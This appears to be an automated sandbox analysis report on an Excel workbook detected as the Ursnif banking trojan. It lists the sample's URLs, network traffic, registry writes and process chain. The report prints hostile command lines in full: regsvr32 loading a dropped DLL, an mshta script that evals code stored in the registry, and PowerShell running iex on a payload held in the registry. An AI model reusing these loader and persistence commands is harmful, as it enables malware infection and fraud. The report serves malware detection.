Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://powerlift.acompli.net
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://settings.outlook.com
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://shell.suite.office.com:1443
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://skyapi.live.net/Activity/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://staging.cortana.ai
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://store.office.cn/addinstemplate
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://store.office.com/addinstemplate
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://store.office.de/addinstemplate
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://tasks.office.com
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://templatelogging.office.com/client/log
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://web.microsoftstream.com/video/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://webshell.suite.office.com
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://wus2.contentsync.
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://wus2.pagecontentsync.
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://www.odwebp.svc.ms

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725

Source: unknown

HTTPS traffic detected: 162.241.253.78:443 -> 192.168.2.3:49725 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 19.3.regsvr32.exe.56b94a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.regsvr32.exe.4d894a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000003.508793933.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.508759247.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.508819476.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.411957077.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.508778168.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.411794580.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.411858229.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.411885260.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.472132410.0000000004B0E000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.531333562.000000000553C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.508710785.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.411972809.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.429184025.0000000004C0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.428651984.0000000004D89000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.520271501.00000000056B9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.508809489.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.411764136.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.411824879.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.508736134.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.508679200.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.411905435.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 5236, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 19.3.regsvr32.exe.56b94a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.regsvr32.exe.4d894a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000003.508793933.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.508759247.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.508819476.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.411957077.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.508778168.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.411794580.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.411858229.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.411885260.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.472132410.0000000004B0E000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.531333562.000000000553C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.508710785.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.411972809.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.429184025.0000000004C0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.428651984.0000000004D89000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.520271501.00000000056B9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.508809489.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.411764136.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.411824879.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.508736134.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.508679200.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.411905435.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 5236, type: MEMORY

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001E39C5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,		3_2_001E39C5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 19_2_00FB39C5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,		19_2_00FB39C5

System Summary:

Office process drops PE file

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\app[1].dll			Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\Public\Documents\decrypt.dll			Jump to dropped file

Writes or reads registry keys via WMI

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: C:\Windows\SysWOW64\regsvr32.exe

Process Stats: CPU usage > 98%

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001E2D06 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	3_2_001E2D06
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001E8005 NtQueryVirtualMemory,	3_2_001E8005
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 19_2_00FB2D06 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	19_2_00FB2D06
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 19_2_00FB8005 NtQueryVirtualMemory,	19_2_00FB8005

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001E2206	3_2_001E2206
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001E3109	3_2_001E3109
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001E7DE0	3_2_001E7DE0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 19_2_00FB2206	19_2_00FB2206
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 19_2_00FB7DE0	19_2_00FB7DE0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 19_2_00FB3109	19_2_00FB3109

Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll			Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSB@31/52@7/2

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_001E513E CreateToolhelp32Snapshot,Process32First,StrStrIA,Process32Next,FindCloseChangeNotification,

3_2_001E513E

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5164:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5748:120:WilError_01

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\{C75402C6-E233-4D86-BA8E-1D986541630A} - OProcSessId.dat

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:\Users\Public\Documents\decrypt.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:\Users\Public\Documents\decrypt.dll
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5008 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5500 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5500 CREDAT:17416 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5500 CREDAT:82956 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5500 CREDAT:17428 /prefetch:2
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Copx='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Copx).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Hl1h='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Hl1h).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\zctvvvtu\zctvvvtu.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a2r2fkec\a2r2fkec.cmdline'
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:\Users\Public\Documents\decrypt.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:\Users\Public\Documents\decrypt.dll	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5008 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5500 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5500 CREDAT:17416 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5500 CREDAT:82956 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5500 CREDAT:17428 /prefetch:2	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\zctvvvtu\zctvvvtu.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a2r2fkec\a2r2fkec.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: unknown unknown

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: documentation_39236.xlsb

Initial sample: OLE zip file path = xl/media/image1.jpg

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000002F.00000002.582791755.000001E9AE630000.00000002.00000001.sdmp, csc.exe, 00000030.00000002.583021854.0000021D92B10000.00000002.00000001.sdmp
Source:	Binary string: mscorlib.pdb source: csc.exe, 0000002F.00000002.590444392.000001E9B11EC000.00000002.00000001.sdmp
Source:	Binary string: c:\Reply-quite\Cry_Country\523\Gave\Color\shape.pdb source: app[1].dll.1.dr

Data Obfuscation:

Suspicious powershell command line found

Show sources

